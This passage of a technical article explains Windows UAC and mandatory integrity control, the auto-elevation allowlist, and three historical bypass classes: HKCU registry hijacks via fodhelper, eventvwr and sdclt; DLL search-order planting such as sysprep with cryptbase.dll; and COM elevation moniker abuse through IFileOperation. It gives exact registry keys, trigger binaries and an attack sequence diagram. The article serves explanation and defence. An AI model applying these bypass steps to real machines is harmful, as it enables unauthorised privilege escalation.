&lt;td&gt;Lifetime&lt;/td&gt;
&lt;td&gt;Entire process lifetime&lt;/td&gt;
&lt;td&gt;Object lifetime only&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Caller IL after&lt;/td&gt;
&lt;td&gt;Caller stays Medium; new process High&lt;/td&gt;
&lt;td&gt;Caller stays Medium&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;New process&lt;/td&gt;
&lt;td&gt;Target executable&lt;/td&gt;
&lt;td&gt;&lt;code&gt;dllhost.exe&lt;/code&gt; host&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Authority surface&lt;/td&gt;
&lt;td&gt;All admin SIDs and privileges, broad&lt;/td&gt;
&lt;td&gt;Methods of one CLSID, narrow&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Typical use&lt;/td&gt;
&lt;td&gt;&quot;Run as administrator&quot; context menu, MSI installers&lt;/td&gt;
&lt;td&gt;Programmatic file copy, Wmi management, registry edits&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Primary canonical bypass class&lt;/td&gt;
&lt;td&gt;DLL-search-order against the new process&lt;/td&gt;
&lt;td&gt;Auto-elevated COM behaviour abuse&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The distinction matters because most of the canonical UAC bypasses do not touch &lt;code&gt;ShellExecuteEx &quot;runas&quot;&lt;/code&gt; at all. Leo Davidson&apos;s December 2009 essay attacked the COM Elevation Moniker by invoking the &lt;code&gt;IFileOperation&lt;/code&gt; COM class (auto-elevation-eligible, registered under the right CLSID) from a Medium-IL caller, and using its &lt;code&gt;CopyItem&lt;/code&gt; method to overwrite a system file at High IL [@davidson-2009][@ifileoperation]. The &lt;code&gt;ICMLuaUtil&lt;/code&gt; and &lt;code&gt;IColorDataProxy&lt;/code&gt; interfaces follow the same shape: a Medium-IL caller instantiates an auto-elevatable COM class via the moniker, and then calls a method on the High-IL object that performs an attacker-chosen action [@uacme].&lt;/p&gt;
&lt;p&gt;Both surfaces share the same backend: Appinfo brokers the token swap, and &lt;code&gt;RAiLaunchAdminProcess&lt;/code&gt; (or its COM equivalent) creates the new process. The difference is whether the elevated child is a whole new process (broad authority for a long time) or a COM object&apos;s host (narrow authority for a single activation). The bypass-research literature exploits the second class far more than the first, because the second class exposes a narrower, more abusable &lt;em&gt;behavioural&lt;/em&gt; surface: the CLSID&apos;s methods.&lt;/p&gt;
&lt;h3&gt;6.4 The auto-elevation allowlist&lt;/h3&gt;
&lt;p&gt;Vista&apos;s prompt fatigue was a usability disaster. Beta reviewers described users clicking through three or four prompts per common task. Windows 7, shipped in October 2009, tried to cut the noise by quietly elevating a curated set of Microsoft-signed binaries with no prompt at all. That single decision shaped the next fifteen years of UAC bypass research, because every &quot;bypass&quot; you have ever read about lives inside the gap between &lt;em&gt;which binary&lt;/em&gt; gets elevated and &lt;em&gt;what the binary does after elevation&lt;/em&gt;.&lt;/p&gt;

The set of Microsoft-signed binaries in trusted system directories on Appinfo&apos;s internal allowlist that elevate without a consent prompt. Four gating conditions: `autoElevate=true` manifest element, Microsoft Authenticode signature, trusted directory path, and an internal Appinfo allowlist entry enforced inside `appinfo.dll`.
&lt;p&gt;The manifest element is a single string. Inside the application&apos;s side-by-side manifest, under the &lt;code&gt;&amp;lt;trustInfo&amp;gt;&lt;/code&gt; / &lt;code&gt;&amp;lt;security&amp;gt;&lt;/code&gt; / &lt;code&gt;&amp;lt;requestedPrivileges&amp;gt;&lt;/code&gt; element, the binary asserts &lt;code&gt;&amp;lt;autoElevate&amp;gt;true&amp;lt;/autoElevate&amp;gt;&lt;/code&gt; [@app-manifests]. That assertion was discovered and publicly documented by independent UK developer Leo Davidson in December 2009 [@davidson-2009].&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;autoElevate=true&lt;/code&gt; manifest assertion is &lt;em&gt;necessary but not sufficient&lt;/em&gt;. Appinfo enforces three additional gating conditions before honouring an auto-elevation request [@davidson-2009].&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;The binary must carry a valid Authenticode signature chained to a Microsoft root certificate.&lt;/li&gt;
&lt;li&gt;The binary&apos;s path must reside under a trusted system directory, in practice &lt;code&gt;%SystemRoot%\System32&lt;/code&gt; or &lt;code&gt;%SystemRoot%\SysWOW64&lt;/code&gt; (or the localized variants for non-English locales).&lt;/li&gt;
&lt;li&gt;The binary&apos;s name must appear on an internal allowlist enforced in code in &lt;code&gt;appinfo.dll&lt;/code&gt;, not in any user-visible policy file.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The fourth gate (the internal allowlist) is the one that surprises practitioners. A binary can be Microsoft-signed, located in &lt;code&gt;System32&lt;/code&gt;, and carry &lt;code&gt;autoElevate=true&lt;/code&gt; in its manifest, and Appinfo can still refuse to auto-elevate it, because the binary&apos;s name is not on the hard-coded allowlist inside &lt;code&gt;appinfo.dll&lt;/code&gt;. There is no public Microsoft-published file enumerating the allowlist; the only way to enumerate it operationally is to scan the manifests of every binary in &lt;code&gt;System32&lt;/code&gt; and cross-check which ones actually auto-elevate.&lt;/p&gt;

The community-standard way to enumerate the manifest-asserting subset of the allowlist is to run Sysinternals `sigcheck -m C:\Windows\System32\*.exe` and pipe the output to `findstr /i autoelevate`. That gives you every binary in `System32` whose embedded manifest asserts `autoElevate=true`. On a Windows 11 25H2 install, the list runs to thirty to forty binaries: `mmc.exe`, `eventvwr.exe`, `fodhelper.exe`, `ComputerDefaults.exe`, `sdclt.exe`, `slui.exe`, and others.&lt;p&gt;The list of &lt;em&gt;names&lt;/em&gt; in the manifest is not the same as the set Appinfo actually auto-elevates. UACMe&apos;s research README enumerates the operational subset: which manifest-asserting binaries Appinfo actually honours, by Windows build, with the technique class and the catalogued bypass method [@uacme]. The canonical observation is that of the manifest-asserting list, only the operationally-allowlisted subset is exploitable, and the operational subset changes silently across feature updates without any security bulletin because none of the resulting bypasses are classified as security vulnerabilities.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;p&gt;{`
// Pseudocode of Appinfo&apos;s auto-elevation decision (Win7+).
// All four gates must pass for auto-elevation without a consent prompt.&lt;/p&gt;
&lt;p&gt;function shouldAutoElevate(binaryPath) {
  // Gate 1: the application manifest must assert autoElevate=true.
  const manifest = readEmbeddedManifest(binaryPath);
  if (manifest?.requestedPrivileges?.autoElevate !== true) return false;&lt;/p&gt;
&lt;p&gt;  // Gate 2: the binary must carry a valid Microsoft Authenticode signature.
  const sig = verifyAuthenticodeSignature(binaryPath);
  if (sig.status !== &apos;valid&apos; || sig.rootCA !== &apos;Microsoft&apos;) return false;&lt;/p&gt;
&lt;p&gt;  // Gate 3: the binary must reside under a trusted system directory.
  const trustedDirs = [&apos;C:\\Windows\\System32\\&apos;, &apos;C:\\Windows\\SysWOW64\\&apos;];
  if (!trustedDirs.some(d =&amp;gt; binaryPath.toLowerCase().startsWith(d.toLowerCase()))) return false;&lt;/p&gt;
&lt;p&gt;  // Gate 4: the binary name must appear on Appinfo&apos;s internal allowlist.
  // This is the one enforced in code in appinfo.dll, not exposed as policy.
  if (!APPINFO_INTERNAL_ALLOWLIST.includes(baseName(binaryPath).toLowerCase())) return false;&lt;/p&gt;
&lt;p&gt;  return true;
}
`}&lt;/p&gt;
&lt;p&gt;Four gating conditions. Three of them constrain &lt;em&gt;which binary&lt;/em&gt; gets elevated. None of them constrain &lt;em&gt;what the binary does after elevation&lt;/em&gt;. The fourth gap, the behavioural one, is the space the bypass-research industry has occupied for fifteen years. That is §7.&lt;/p&gt;
&lt;h2&gt;7. Twenty Years of Bypass Research as Empirical Test&lt;/h2&gt;
&lt;p&gt;In February 2007, eleven days after Vista&apos;s consumer launch, Mark Russinovich published a TechNet Blogs post titled &lt;em&gt;PsExec, User Account Control and Security Boundaries&lt;/em&gt;. The post walked through a quirk of how PsExec&apos;s &lt;code&gt;-l&lt;/code&gt; switch interacted with restricted tokens on Windows XP, used the walkthrough to introduce Vista&apos;s integrity-level model, and then dropped a single sentence the entire later debate would rest on [@russinovich-blog-2007].&lt;/p&gt;

Neither UAC elevations nor Protected Mode IE define new Windows security boundaries... potential avenues of attack, regardless of ease or scope, are not security bugs. -- Mark Russinovich, *PsExec, User Account Control and Security Boundaries*, TechNet Blogs, February 12, 2007
&lt;p&gt;That sentence, in the public record from week one, is the architectural reason every &quot;UAC bypass&quot; published from 2009 onward was classified by Microsoft as a non-vulnerability. The bypass-research literature is the empirical proof of the disclaimer, not a counterargument to it. Three durable bypass classes carry the empirical weight.&lt;/p&gt;
&lt;h3&gt;7.1 The &lt;code&gt;ms-settings&lt;/code&gt; / &lt;code&gt;DelegateExecute&lt;/code&gt; registry-hijack class&lt;/h3&gt;
&lt;p&gt;The first durable class is the registry-hijack bypass of auto-elevated binaries. Mechanism: an auto-elevated binary (&lt;code&gt;eventvwr.exe&lt;/code&gt;, &lt;code&gt;fodhelper.exe&lt;/code&gt;, &lt;code&gt;ComputerDefaults.exe&lt;/code&gt;, certain &lt;code&gt;sdclt.exe&lt;/code&gt; variants) executes a handler for a custom file extension or URL protocol on launch. The relevant handler mapping is in &lt;code&gt;HKCR&lt;/code&gt;, but Windows resolves &lt;code&gt;HKCR&lt;/code&gt; by first consulting &lt;code&gt;HKCU\Software\Classes&lt;/code&gt; and only falling back to &lt;code&gt;HKLM\Software\Classes&lt;/code&gt; if no per-user mapping exists. A Medium-IL user can write to &lt;code&gt;HKCU&lt;/code&gt; without elevation. So the user writes a &lt;code&gt;HKCU\Software\Classes\&amp;lt;scheme&amp;gt;\shell\open\command&lt;/code&gt; key whose default value is an arbitrary command line and whose &lt;code&gt;DelegateExecute&lt;/code&gt; value is the empty string. Then the user launches the auto-elevated binary. The binary loads, Appinfo elevates it to High IL, the binary resolves its registered handler, walks &lt;code&gt;HKCU\Software\Classes&lt;/code&gt; first, finds the attacker-controlled command line, and executes it. The attacker&apos;s command runs at High IL [@enigma-eventvwr][@mitre-t1548002].&lt;/p&gt;
&lt;p&gt;The first public canonical demonstration was Matt Nelson&apos;s August 15, 2016 post &lt;em&gt;Fileless UAC Bypass Using eventvwr.exe and Registry Hijacking&lt;/em&gt;, published on his blog under the handle &lt;code&gt;enigma0x3&lt;/code&gt;. Nelson hijacked the &lt;code&gt;mscfile&lt;/code&gt; association by writing &lt;code&gt;HKCU\Software\Classes\mscfile\shell\open\command&lt;/code&gt; with &lt;code&gt;cmd.exe&lt;/code&gt; as the default value, then launched &lt;code&gt;eventvwr.exe&lt;/code&gt;. The Event Viewer auto-elevates because of its manifest, resolves the &lt;code&gt;mscfile&lt;/code&gt; association to load &lt;code&gt;eventvwr.msc&lt;/code&gt;, walks the HKCU mapping first, finds &lt;code&gt;cmd.exe&lt;/code&gt; instead of &lt;code&gt;mmc.exe&lt;/code&gt;, and launches an attacker-controlled &lt;code&gt;cmd.exe&lt;/code&gt; at High IL [@enigma-eventvwr]. The technique required no file on disk except the registry value itself; this is what &lt;em&gt;fileless&lt;/em&gt; means in this context.&lt;/p&gt;
&lt;p&gt;Nelson productised the class through 2017. The March 14, 2017 &lt;em&gt;Bypassing UAC Using App Paths&lt;/em&gt; post generalised to &lt;code&gt;HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe&lt;/code&gt;, exploited by &lt;code&gt;sdclt.exe&lt;/code&gt; [@enigma-apppaths]. The March 17, 2017 &lt;em&gt;&apos;Fileless&apos; UAC Bypass Using sdclt.exe&lt;/em&gt; post showed a fileless variant of the same attack using the &lt;code&gt;IsolatedCommand&lt;/code&gt; REG_SZ value on &lt;code&gt;HKCU:\Software\Classes\Folder\shell\open\command&lt;/code&gt;, with &lt;code&gt;sdclt.exe /KickOffElev&lt;/code&gt; as the trigger [@enigma-sdclt]. The same post referenced WikiLeaks&apos;s March 2017 Vault7 disclosures, in which the CIA&apos;s &quot;Vault7&quot; cache contained operationalised versions of the technique, confirming nation-state adoption of the bypass class [@enigma-sdclt].&lt;/p&gt;
&lt;p&gt;The fodhelper variant was published on May 12, 2017 by winscripting.blog, in the post &lt;em&gt;First entry: Welcome and fileless UAC bypass&lt;/em&gt; (&lt;code&gt;winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/&lt;/code&gt;); it abuses &lt;code&gt;HKCU\Software\Classes\ms-settings\shell\open\command&lt;/code&gt;. It is a separate researcher&apos;s contribution, not part of Nelson&apos;s series, and is anchored by UACMe Method 33 (credited to winscripting.blog) and MITRE ATT&amp;amp;CK T1548.002 [@uacme][@mitre-t1548002].&lt;/p&gt;

sequenceDiagram
    participant U as User (Medium IL)
    participant R as HKCU registry
    participant F as fodhelper.exe (auto-elevated)
    participant A as Appinfo (LocalSystem)
    participant C as Attacker payload (High IL)
    U-&amp;gt;&amp;gt;R: Write HKCU Software Classes ms-settings shell open command with attacker cmd
    U-&amp;gt;&amp;gt;F: ShellExecute(&quot;fodhelper.exe&quot;)
    F-&amp;gt;&amp;gt;A: Request elevation (autoElevate gate passes)
    A-&amp;gt;&amp;gt;F: New process at High IL, no consent prompt
    F-&amp;gt;&amp;gt;R: Resolve ms-settings handler via HKCU first
    R--&amp;gt;&amp;gt;F: Returns attacker command
    F-&amp;gt;&amp;gt;C: Spawn attacker payload at High IL
&lt;p&gt;Microsoft&apos;s response to the eventvwr bypass was to ship a fix in the Windows 10 Creators Update (1703) that made &lt;code&gt;eventvwr.exe&lt;/code&gt; not consult the registered association the technique exploited. The fix was &lt;em&gt;technique-specific&lt;/em&gt;, not class-specific: the &lt;code&gt;ms-settings&lt;/code&gt; (fodhelper), App Paths (sdclt), and &lt;code&gt;IsolatedCommand&lt;/code&gt; (sdclt) variants remained exploitable through subsequent Windows 10 builds and into Windows 11 [@uacme][@mitre-t1548002]. None of these were patched as security vulnerabilities, because, per Russinovich 2007, UAC is not a security boundary [@russinovich-blog-2007].&lt;/p&gt;
&lt;h3&gt;7.2 The DLL-search-order class&lt;/h3&gt;
&lt;p&gt;The second durable class is the DLL-search-order attack against auto-elevated binaries. Mechanism: an auto-elevated binary calls &lt;code&gt;LoadLibrary&lt;/code&gt; on a DLL name resolved via the standard Windows search order: the application directory, the system directory, the current directory, the &lt;code&gt;PATH&lt;/code&gt; environment variable, and so on. If any path on that search order earlier than the legitimate one is writable by the Medium-IL caller, the caller can plant an attacker DLL at that path. When the auto-elevated binary loads the legitimate name, the search order returns the attacker&apos;s DLL first, and the DLL is loaded at the binary&apos;s elevated IL [@davidson-2009].&lt;/p&gt;
&lt;p&gt;The foundational canonical example is the December 2009 Leo Davidson essay &lt;em&gt;Windows 7 UAC whitelist: Code injection issue (and more)&lt;/em&gt;. Davidson demonstrated that &lt;code&gt;sysprep.exe&lt;/code&gt; (Microsoft-signed, in &lt;code&gt;System32&lt;/code&gt;, auto-elevation-allowlisted) loads &lt;code&gt;cryptbase.dll&lt;/code&gt; from its working directory before the system directory. By copying &lt;code&gt;sysprep.exe&lt;/code&gt; and a malicious &lt;code&gt;cryptbase.dll&lt;/code&gt; into a writable directory and launching &lt;code&gt;sysprep.exe&lt;/code&gt; from there, an attacker could load the malicious DLL into a High-IL process [@davidson-2009]. The same essay introduced the &lt;code&gt;IFileOperation&lt;/code&gt; COM-object technique that founded the second durable class (§7.3), making the December 2009 Davidson essay the single most-cited primary in the entire UAC bypass literature.&lt;/p&gt;
&lt;p&gt;Coverage in the trade press confirmed the class&apos;s significance immediately. In February 2009, &lt;em&gt;The Register&lt;/em&gt; reported on a related Long Zheng / Rafael Rivera disclosure that demonstrated piggybacking on auto-elevation via &lt;code&gt;rundll32.exe&lt;/code&gt; [@register-2009], establishing that the auto-elevation surface had been understood as exploitable from the moment Windows 7 shipped.&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s mitigations against the DLL-search-order class have been incremental. &lt;code&gt;SafeDllSearchMode&lt;/code&gt; was made the default in Windows XP SP2 and reshuffled the search order so the application directory came before the current directory. The &lt;code&gt;LOAD_LIBRARY_SEARCH_*&lt;/code&gt; flags (introduced in Windows 8 and backported to Vista and 7 via update KB2533623) let applications opt into stricter search behaviour. Side-by-side manifest pinning and the &lt;code&gt;KnownDLLs&lt;/code&gt; mechanism shrink the surface further. All of these are application-author opt-ins; an auto-elevated binary that does not use them remains exploitable, and UACMe&apos;s catalogue of 81 methods includes numerous DLL-search-order entries across Windows versions [@uacme].&lt;/p&gt;
&lt;h3&gt;7.3 The auto-elevated COM-object behaviour-abuse class&lt;/h3&gt;
&lt;p&gt;The third durable class abuses the &lt;em&gt;behaviour&lt;/em&gt; of auto-elevation-eligible COM classes. Mechanism: a COM class registered as auto-elevation-eligible (the &lt;code&gt;IFileOperation&lt;/code&gt; / &lt;code&gt;ICMLuaUtil&lt;/code&gt; / &lt;code&gt;IColorDataProxy&lt;/code&gt; family historically, then the explicit &lt;code&gt;COMAutoApprovalList&lt;/code&gt; registry surface introduced in Windows 10 RS1 / build 14393 in August 2016) can be instantiated High-IL by a Medium-IL caller via the COM Elevation Moniker. Once instantiated, the High-IL object exposes methods (file copy, registry write, executable launch) that perform actions at High IL using whatever parameters the caller passes [@davidson-2009][@ifileoperation].&lt;/p&gt;
&lt;p&gt;Davidson&apos;s &lt;code&gt;IFileOperation&lt;/code&gt; proof of concept from December 2009 is the canonical example. A Medium-IL caller instantiates &lt;code&gt;IFileOperation&lt;/code&gt; via the COM Elevation Moniker. The resulting &lt;code&gt;dllhost.exe&lt;/code&gt; runs at High IL and exposes &lt;code&gt;IFileOperation::CopyItem&lt;/code&gt; and related methods. The caller invokes &lt;code&gt;CopyItem(&quot;evil.dll&quot;, &quot;C:\\Windows\\System32\\&quot;)&lt;/code&gt;. The High-IL &lt;code&gt;dllhost.exe&lt;/code&gt; performs the copy, because the High-IL token has write access to &lt;code&gt;%SystemRoot%\System32&lt;/code&gt;. The caller has now planted a DLL in &lt;code&gt;System32&lt;/code&gt; without ever holding a High-IL token itself [@davidson-2009][@ifileoperation].&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;COMAutoApprovalList&lt;/code&gt; era began in August 2016 with the Windows 10 Anniversary Update (RS1, build 14393). Microsoft added a dedicated registry surface at &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\UAC\COMAutoApprovalList&lt;/code&gt; enumerating which CLSIDs &lt;code&gt;consent.exe&lt;/code&gt; would auto-elevate without a prompt. The change was unannounced: there is no Microsoft-published security bulletin naming the introduction. The community anchor is UACMe Method 49, whose fix-note carries the verbatim &quot;Side effect of consent.exe COMAutoApprovalList introduction&quot; against the &lt;code&gt;TpmInit.exe&lt;/code&gt; &lt;code&gt;ICreateNewLink&lt;/code&gt; technique, dated to RS1 / build 14393 [@uacme]. Method 27 captures the subsequent narrowing in RS3 (Insider build 16199), when Microsoft removed the &lt;code&gt;UninstallStringLauncher&lt;/code&gt; interface from the list.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Class&lt;/th&gt;
&lt;th&gt;Mechanism&lt;/th&gt;
&lt;th&gt;Canonical research&lt;/th&gt;
&lt;th&gt;Microsoft response&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Registry-hijack (DelegateExecute)&lt;/td&gt;
&lt;td&gt;Auto-elevated binary resolves user-writable HKCU handler&lt;/td&gt;
&lt;td&gt;Nelson, eventvwr Aug 2016; sdclt and fodhelper 2017&lt;/td&gt;
&lt;td&gt;Patched individual binaries; class never classified as security vulnerability&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;DLL-search-order&lt;/td&gt;
&lt;td&gt;Auto-elevated binary loads attacker DLL via standard search path&lt;/td&gt;
&lt;td&gt;Davidson, December 2009 (sysprep + cryptbase)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;SafeDllSearchMode&lt;/code&gt;, &lt;code&gt;LOAD_LIBRARY_SEARCH_*&lt;/code&gt;, KnownDLLs; shrunk but not eliminated&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Auto-elevated COM behaviour&lt;/td&gt;
&lt;td&gt;Medium-IL caller invokes High-IL methods via moniker&lt;/td&gt;
&lt;td&gt;Davidson, December 2009 (IFileOperation); COMAutoApprovalList RS1 Aug 2016&lt;/td&gt;
&lt;td&gt;Curated allowlist; entries added or removed in feature updates without CVEs&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;h3&gt;7.4 The doctrine and the aha&lt;/h3&gt;
&lt;p&gt;The two distinct 2007 sources need precise attribution, because the citation chain is the load-bearing artifact of the entire UAC-as-not-a-boundary argument.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The verbatim &quot;Neither UAC elevations nor Protected Mode IE define new Windows security boundaries&quot; sentence lives in the &lt;em&gt;PsExec, User Account Control and Security Boundaries&lt;/em&gt; TechNet Blogs post by Mark Russinovich, dated February 12, 2007 [@russinovich-blog-2007]. The architectural reference that most practitioners cite, &lt;em&gt;Security: Inside Windows Vista User Account Control&lt;/em&gt;, was published in the June 2007 issue of &lt;em&gt;TechNet Magazine&lt;/em&gt; and is the canonical reference for the integrity model, file/registry virtualisation, and the elevation pipeline [@russinovich-tnm-2007]. The architectural article does not contain the &quot;not a security boundary&quot; sentence; the February blog post does. Conflating the two is a citation error and gives the wrong impression of when Microsoft committed to the boundary classification.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The Microsoft Security Response Center&apos;s &lt;a href=&quot;https://paragmali.com/blog/windows-security-boundaries-the-document-that-decides-what-g/&quot; rel=&quot;noopener&quot;&gt;published servicing criteria&lt;/a&gt; define a security boundary as one that &quot;provides a logical separation between the code and data of security domains with different levels of trust&quot; [@msrc-criteria]. The MSRC servicing-criteria page enumerates which Windows boundaries qualify under that definition. Through the Vista-through-Windows-10 era (2007-2024), UAC was explicitly classified as a security &lt;em&gt;feature&lt;/em&gt;, not a boundary, in the enumeration table on that page. The enumeration is rendered client-side (in JavaScript) and not visible through static fetches; the canonical confirmation for the classification is the Russinovich February 2007 sentence above, repeated and re-affirmed in Microsoft public statements throughout the period [@russinovich-blog-2007].&lt;/p&gt;
&lt;p&gt;Forshaw&apos;s January 2026 Project Zero post on Administrator Protection reads the doctrine clearly in retrospect: &quot;due to the way it was designed, it was quickly apparent it didn&apos;t represent a hard security boundary, and Microsoft downgraded it to a security feature&quot; [@forshaw-adminprot-jan26]. Forshaw&apos;s &quot;downgraded&quot; wording is useful retrospective shorthand, but Russinovich&apos;s February 2007 post shows the public classification from the start: UAC elevation was a security feature, not a Windows security boundary, from the moment it shipped. The reclassification in November 2024 was a &lt;em&gt;re-promotion&lt;/em&gt; with new architecture, not a fix to the old architecture.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The twenty-year UAC bypass-research record is empirical confirmation, not counterargument, of the architect&apos;s 2007 disclaimer. Microsoft did not fix the bypasses as security vulnerabilities because Russinovich had already said in writing that there was nothing to &quot;fix&quot;: the consent prompt was a convenience, not a boundary. The bypass record is the proof that the disclaimer was honest from week one.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;For the Windows administrator who has watched the bypass-research industry produce a new fileless bypass every six to twelve months, the reframing is the load-bearing aha of the entire article. The bypasses are not bugs Microsoft has failed to fix. They are the empirical map of the access-control versus information-flow gap that any access-control primitive runs into in a backward-compatible OS. The empirical record from 2009 forward (Davidson, Nelson, hfiref0x, Forshaw) is the cumulative confirmation that the disclaimer was honest.&lt;/p&gt;
&lt;p&gt;If MIC, UIPI, and the split-token model are sound primitives, and the bypasses do not violate Microsoft&apos;s own classification of them, what are the actual theoretical limits of integrity-level systems? What can MIC and UIPI never do, by design?&lt;/p&gt;
&lt;h2&gt;8. Theoretical Limits: What MIC and UIPI Cannot Do, by Design&lt;/h2&gt;
&lt;p&gt;The 2007 disclaimer was not just an admission of weakness. It was an accurate statement of the theoretical limits of any access-control primitive in a backward-compatible operating system. The bypass-research industry of 2009 to 2026 has empirically traced out those limits one technique at a time, and a careful reading of the theory tells us why the trace looks the way it does.&lt;/p&gt;
&lt;h3&gt;Biba 1977 and the three rules&lt;/h3&gt;
&lt;p&gt;The integrity model MIC implements comes from Kenneth J. Biba&apos;s 1977 MITRE technical report MTR-3153 [@biba-wiki]. Biba&apos;s model is the integrity-side mirror of the better-known Bell-LaPadula confidentiality model [@blp-wiki]: where Bell-LaPadula&apos;s &quot;no read up&quot; prevents confidentiality leaks, Biba&apos;s &quot;no write up&quot; prevents integrity contamination. The Biba model defines three rules.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Simple Integrity Property&lt;/strong&gt; (&lt;em&gt;no read down&lt;/em&gt;): a subject at integrity level $I_s$ cannot read an object at integrity level $I_o &amp;lt; I_s$. A High-IL subject cannot read Low-IL data, because Low-IL data may have been written by an untrusted source and might contaminate the subject&apos;s state.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Star Integrity Property&lt;/strong&gt; (&lt;em&gt;no write up&lt;/em&gt;): a subject at integrity level $I_s$ cannot write an object at integrity level $I_o &amp;gt; I_s$. A Low-IL subject cannot write to a High-IL object, because the Low-IL subject&apos;s writes would degrade the High-IL object&apos;s integrity.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Invocation Property&lt;/strong&gt;: a subject at integrity level $I_s$ cannot invoke (call, request services from) a subject at integrity level $I_o &amp;gt; I_s$. A Low-IL caller cannot ask a High-IL server to perform an action on the caller&apos;s behalf, because the High-IL server would then act on Low-IL inputs.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;MIC implements the Star Integrity Property as the &lt;em&gt;default&lt;/em&gt; &lt;code&gt;NO_WRITE_UP&lt;/code&gt; policy. Every object that does not explicitly request a different policy is protected against lower-IL writes [@mic-doc][@mandatory-label-ace]. That is the one Biba rule MIC actually enforces.&lt;/p&gt;
&lt;p&gt;MIC does &lt;em&gt;not&lt;/em&gt; implement Biba&apos;s Simple Integrity Property at all. There is no &lt;code&gt;NO_READ_DOWN&lt;/code&gt; policy in the &lt;code&gt;winnt.h&lt;/code&gt; mandatory-label-policy enumeration. The opt-in &lt;code&gt;NO_READ_UP&lt;/code&gt; bit MIC exposes points the other way: it stops a &lt;em&gt;lower&lt;/em&gt;-IL subject from reading a &lt;em&gt;higher&lt;/em&gt;-IL object, which is structurally Bell-LaPadula&apos;s Simple Security Property (no read up for confidentiality) repurposed onto an integrity SID rather than a confidentiality label [@blp-wiki][@mandatory-label-ace]. By default, a Low-IL process can read a High-IL file. This is the design choice Forshaw&apos;s &lt;em&gt;Reading Your Way Around UAC&lt;/em&gt; series turned into a research program in 2017 [@forshaw-reading-uac].&lt;/p&gt;
&lt;p&gt;MIC does &lt;em&gt;not&lt;/em&gt; implement the Invocation Property either. A Medium-IL process can invoke a High-IL service via the COM Elevation Moniker, via &lt;code&gt;ShellExecuteEx &quot;runas&quot;&lt;/code&gt;, via any of the auto-elevated binaries, via RPC to Appinfo. The absence of the Invocation Property is exactly what makes UAC operationally usable: a strict reading of Biba would forbid every brokered elevation surface in Windows, and the OS would be unbearable to use. The omission is deliberate, and it is the theoretical reason why every &quot;bypass&quot; of UAC is technically a &lt;em&gt;use&lt;/em&gt; of an architectural surface, not a violation of it.&lt;/p&gt;

flowchart LR
    subgraph BIBA [&quot;Biba 1977 -- integrity model&quot;]
        A[&quot;Biba 1977&lt;br /&gt;integrity model&quot;] --&amp;gt; B[&quot;Simple Integrity&lt;br /&gt;(no read down)&quot;]
        A --&amp;gt; C[&quot;Star Integrity&lt;br /&gt;(no write up)&quot;]
        A --&amp;gt; D[&quot;Invocation Property&lt;br /&gt;(no invoke up)&quot;]
        B --&amp;gt; E[&quot;MIC: not implemented&lt;br /&gt;(no NO_READ_DOWN policy in winnt.h)&quot;]
        C --&amp;gt; F[&quot;MIC: default NO_WRITE_UP&lt;br /&gt;(on by default)&quot;]
        D --&amp;gt; G[&quot;MIC: not implemented&lt;br /&gt;(COM moniker, runas verb, Appinfo)&quot;]
    end
    subgraph BLP [&quot;Bell-LaPadula 1973 -- confidentiality model&quot;]
        H[&quot;Bell-LaPadula 1973&lt;br /&gt;confidentiality model&quot;] --&amp;gt; I[&quot;Simple Security&lt;br /&gt;(no read up)&quot;]
        I --&amp;gt; J[&quot;MIC: opt-in NO_READ_UP&lt;br /&gt;(off by default, repurposed onto IL)&quot;]
    end

Strict Biba would forbid every brokered-elevation primitive in Vista. The COM Elevation Moniker, `ShellExecuteEx &quot;runas&quot;`, the entire RPC interface to Appinfo, the `IFileOperation`-class auto-elevated COM objects, the manifest-based elevation request: all of these are explicitly *invocations* by a lower-IL caller of a higher-IL server [@biba-wiki].&lt;p&gt;Microsoft&apos;s architectural decision was that brokered elevation is the operationally usable workaround. A Medium-IL caller cannot invoke a High-IL server directly, but a Medium-IL caller can ask the SYSTEM-trusted Appinfo broker to create a High-IL process whose initial state the broker controls. The broker is the mediation point. The brokered model is structurally weaker than strict Biba, and that weakness is exactly the surface the bypass-research industry has operated in for sixteen years. Every COM-elevation moniker bypass, every auto-elevation registry hijack, every DLL-search-order attack is a refinement of the same observation: brokered elevation lets Medium-IL inputs influence High-IL outputs in ways the broker cannot fully validate.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;h3&gt;The access-control versus information-flow gap&lt;/h3&gt;
